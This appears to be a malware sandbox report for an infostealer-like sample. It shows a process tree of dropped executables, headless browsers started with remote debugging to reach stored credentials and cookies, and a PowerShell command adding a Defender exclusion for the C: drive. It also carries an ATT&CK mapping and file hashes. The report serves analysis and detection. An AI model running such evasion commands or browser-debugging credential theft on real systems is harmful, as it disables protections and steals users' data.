C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:29⤵PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2648,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:89⤵PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3584,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:19⤵
- Uses browser remote debugging
PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3600,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:19⤵
- Uses browser remote debugging
PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5012,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:19⤵
- Uses browser remote debugging
PID:4452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5068,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:19⤵
- Uses browser remote debugging
PID:4568
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6440 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb8712dcf8,0x7ffb8712dd04,0x7ffb8712dd109⤵PID:6456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2120,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2116 /prefetch:39⤵PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2088,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2080 /prefetch:29⤵PID:6640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2620,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2616 /prefetch:89⤵PID:6712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3080 /prefetch:19⤵
- Uses browser remote debugging
PID:6752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3124 /prefetch:19⤵
- Uses browser remote debugging
PID:6760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4260 /prefetch:29⤵
- Uses browser remote debugging
PID:6824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,2374366674487000523,12129548381096924157,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4656 /prefetch:19⤵
- Uses browser remote debugging
PID:7120
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6980
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Suspicious use of FindShellTrayWindow
PID:2168
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:5700
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:1152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 13968⤵
- Program crash
PID:6292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"6⤵PID:6424
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2q212ibw\2q212ibw.cmdline"7⤵PID:6748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C5C.tmp" "c:\Users\Admin\AppData\Local\Temp\2q212ibw\CSCDBF501327B9B443E8EC044DBFDC744E.TMP"8⤵PID:7076
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:7152
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"6⤵PID:6744
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:7048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:6868
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:7100
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:1868
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:6292
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4536 -ip 45361⤵PID:4320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5500 -ip 55001⤵PID:3628
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:736
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:1240
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:392
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:3612
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5odnhcyk\5odnhcyk.cmdline"3⤵PID:3380
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD21.tmp" "c:\Users\Admin\AppData\Local\Temp\5odnhcyk\CSC2E7C4E1890404F3FAB95FDB09E6C1677.TMP"4⤵PID:2564
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1496
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1160
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3860
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3596
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5352 -ip 53521⤵PID:6264
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:6844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:4300
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:2528
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:4260
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵PID:916
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1if5qlz\q1if5qlz.cmdline"3⤵PID:3468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4452
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75D2.tmp" "c:\Users\Admin\AppData\Local\Temp\q1if5qlz\CSC10C92892E3C84EAEB3BA56AF4813F462.TMP"4⤵PID:6556
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:6596
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:6604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6896
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Authentication Process
1Modify Registry
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD592519d1943b3f382be909206a169b631
SHA1f050b350858a28c576e46052a5ce502650367210
SHA2567831ac2058c0ea7598867ae0b839d78e03a7117a4d8b0a23130e4c4825cbac8d
SHA5128a533c510ccedb322e0d5bb80855889ad1e857811c2c58f95abdf322f4163af341d661df71707d8c25cda3e6ff4f7c2d2343dfc206100e65348b6027467d9a18
-
Filesize
79KB
MD5a12f43004f64c2cad0c70db72b28197e
SHA182f2463241e5c80808adcbc401022592a52379f8
SHA25654c9c989a7f21922f23fc55a9ab885ea8655dad356909ee7498719e656d0aaca
SHA512deab0fb90fbdaab1cadc45a83f1fdc880fb22c6f6bd87f54ccee58c0d441950b7e69be77d2186421d8a4edadaa010af0142e5ef829979046e38a6362ac3dd846
-
Filesize
280B
MD58625e8ce164e1039c0d19156210674ce
SHA19eb5ae97638791b0310807d725ac8815202737d2
SHA2562f65f9c3c54fe018e0b1f46e3c593d100a87758346d3b00a72cb93042daf60a2
SHA5123c52b8876982fe41d816f9dfb05cd888c551cf7efd266a448050c87c3fc52cc2172f53c83869b87d7643ce0188004c978570f35b0fcc1cb50c9fffea3dec76a6
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
41KB
MD5279eaa49db1644eec22fc60002f93c3a
SHA1db64cd9ab31ec2afa5106fec6c40aefae501ee6a
SHA256196b7e475acd9b390fc75359dedaf9d8186e57529aabdeb218dd89035cf2db25
SHA51251e631be25d9174c7630d7af4dac9d3d3d22a42ee03a0b9c526a78fcd94b178fcf5acdba4646a7e1e4f87c78020c62011329ca1bcd6fa6dc3f54a5ca5ddcb223
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iauxn5db.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD5257d66587bc04d38ff019cb523162052
SHA1e16a7ab9f29a26c6026dca990c79eea591d7c0e2
SHA2565fc47624034d82a12084fe965379494966c2977be86d8eeaf589bf738151ed27
SHA5120f5e5b86f793762c6a9396e57a5803f79a1a7704275f1af3493e14a5d6048115a845663229d66748ee66749687e6ac34c68eff88976fb6be8ee9c3f3f8f6ac0a
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iauxn5db.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD514ed695cdedc9da4f28ce6d8de2e922f
SHA1cbad3043734aaecf4eb75506616738ad173ca76f
SHA256155d8bc868e7e895c4d01b22e8312cac0d67f720708de5d1971de18c407a4d71
SHA512a93be1a6010220773fdb66abad77bff2672105789e12e417bde76002070853ac44c89050ce291be44687d466079b761f9f319690e3d543914221174c4c90b4a4
-
Filesize
3.1MB
MD50bc69609d28f954c1349365683ce5230
SHA16fb6d7ec9d7b32a8f63059357655206042362dbc
SHA2569a1ec9edad991c2bd77e8cbedce6047caa84cde2e11ca30959ba4b3d7c6b7895
SHA5129ec59259560f5fddde939e82aad2c588535edeba2d71af83cfa12dbc58d332c2b3c78d3009f119350067854185899357cd641047133a19c258b810711fd85b92
-
Filesize
3.5MB
MD5d546ca721b7eb5805324a652167e9d06
SHA1078ef0b03d72ad77b6c0aef6d5643548bd4014cd
SHA256b744ab8e1f5b87327281e9c6559c8f8d460439c054dd3783ed395137fcae8064
SHA51279290e1ad225916c8ff473c7866770a01c42d9d5a77687314153548ca049dfc0521c29111c3f3239ef4ada7f127826a6dbf3ebc472e83a422901cec04230ef23
-
Filesize
674KB
MD532449d0a9a4698567ce8f4900e2cb370
SHA155817857ea2a8c6781eefd542f8f65bae756314a
SHA25616beaf84a5f731c5c450a8535b9d53e1aa7184e230883bd57b351bf4561bec72
SHA512b81c603d2e795093764ab807793f0403ff94feaa2155d68a9c75cc1eceb9360a4c54aedfd90a857f7e0333a3dbae6a0d3bbb9a40e017697b9d3511637f2bc74f
-
Filesize
351KB
MD5b319ac6eebf5309c09a2343aa872bb45
SHA136c20894e6b4eab76812276b35acf42b1e843bb8
SHA256d6d59048de8343ea4e41f256925e6f453b9b7d3fd0212e566cd90c9bd6235566
SHA5129fe8b5dc04404061557327b6bc20b91a22a800daa8b56a9befbb6ba9f1ec79ee9c74d653bbf41680a3e2f6f68e81f5ce22103df02502d7ca05b4db499bd5c652
-
Filesize
674KB
MD5c6a119bfd5690fd9740d4b0ceda18c46
SHA1df5dab76f8b434996d47261010066764b514d016
SHA2569d2adad9a2ce99316677b5133953f620720286d5820c0d54adb610ddb71cb8bd
SHA5127b32de5296b3b73965fb8b274229402673c5ac993f8abafc3304e48e1cf44bfd5fb40433948d7616ded8bf5da251bbfe152287a11b7e072d42ab609854cf659a
-
Filesize
667KB
MD50afa04b1f3d5b4eb402367bd172e0957
SHA17e0e77df6601ae29af49e85b741cec23b93bff6f
SHA256f0a9ef468c521425b19517c69a315ac2acbc2f1a6b48d3a29c2faf1777979205
SHA51299d89102a1cf337cae4644ba2ca12b15ab63573829aa6817f3d6381febc0133056d451f4b63dcf7c7cd14ce4ca2554221084fc1b18a29f4f0c00dabeaea9ef9c
-
Filesize
2.0MB
MD58978bcf53b3f0678ed355ec2f16e9cf4
SHA1d0691ac7211e21ac15b59a5ccac6e2d2788c6e1e
SHA256330fda4e036f1d227a5fa8e416559923b3dc5b9ed9bfb2e92ec22b48395f24b9
SHA512a59376e7c47bf226a97a068f3a3e5ae10c4f885613af8f9cc8eea0a52b08a4c13e314f14f3c8fd9c286ce435dcdf342d72647ca5a27ab666b3f9154f7bc86b5b
-
Filesize
2.4MB
MD58c7d359343cea4f85312bf683e8293ac
SHA1498a5c092fb946a73156f847eaf65dc58d3306f0
SHA25630cd9977b8c440fb6b9aadeca7e7d170058ae432b955ee5aba5da836e37789d0
SHA5124054bc770b7bbaddec618e1b11324b0a164cce07909fe2d6367bdc5c1932137ce02d7eb32c0e0f50ea81fb5cdfca4e7527ebfd2ecf7b1beae6877911bb33e23d
-
Filesize
950KB
MD5def1c8fa3b480332a08446920d5607b3
SHA126e92a2a2bed2ea3136b4f6e5a007d933cbc1be7
SHA256ad7af0d8b244f35b98fa378ad09289afd07f3463f2870208ba1cbefacf2f5537
SHA51262e9c987ad3bc9cdac0b46f5adfe3b890cc299359069f0505c864e9c6b5299e7623193fe668313865e1f32860af4e55f1544f4fc9770ce4b79143985d5c11fa9
-
Filesize
1.9MB
MD5d7661a891807b6508edab51e1cb60b25
SHA1ae6ea41a17ddd2995836ab9279207a5b444d539a
SHA2569395ad01afdd8d4a4b6dff33bf6e82e502d765f0a63315a88a97ba4279dcbb16
SHA512b909887acebba72a4f5f1516a51f64b9676fa77faa39b86283b639c7115e081d37758246b3f9d4bfaee726e3174d71154235da097b55ebbe943d942ec03883e4
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
1.4MB
MD5f3f9535109155498021e63c23197285f
SHA1cf2198f27d4d8d4857a668fa174d4753e2aa1dca
SHA2561ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f
SHA512a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755
-
Filesize
730KB
MD531aeed8d880e1c68a97f0d8739a5df8a
SHA1d6f140d63956bc260639ab3c80f12a0e9b010ee9
SHA256bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97
SHA512bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748
-
Filesize
18.2MB
MD52ed83182a2c54f262b0b63ab54ebe8f2
SHA14a3a0e023b11d89e21fe2d410d329dd3087cc259
SHA2566b15d8a3ac38d07997df344bde98a1eabd49bf52f5fe4c8f256c60951859021d
SHA5125c9656af97dafaaa29e415b39ee679ab3ac6c746b29ee79ac50a662b0c07003731d18a7e3fbc5941942ebda195e768a99c38116f75bbaa17fe6d2dba7ff33d97
-
Filesize
8.8MB
MD579615746124e8e66ce5d578fc7da30d5
SHA1dd2b73e558fc20179fe4abc998ffcdab3551c705
SHA256b6d8191caf0fb0a1e1e93094a67444b426bf2591a9aac51192de8de5fdddc73a
SHA51211c886a7d222e8bba89ef43bbc8dc722fad9bcf4a519df2d1d984e5a03a74ce52bc5be1ac7c77acce57168e3d737438b4c3d292e64356277597dadd2a5e5417e
-
Filesize
1.1MB
MD55adca22ead4505f76b50a154b584df03
SHA18c7325df64b83926d145f3d36900b415b8c0fa65
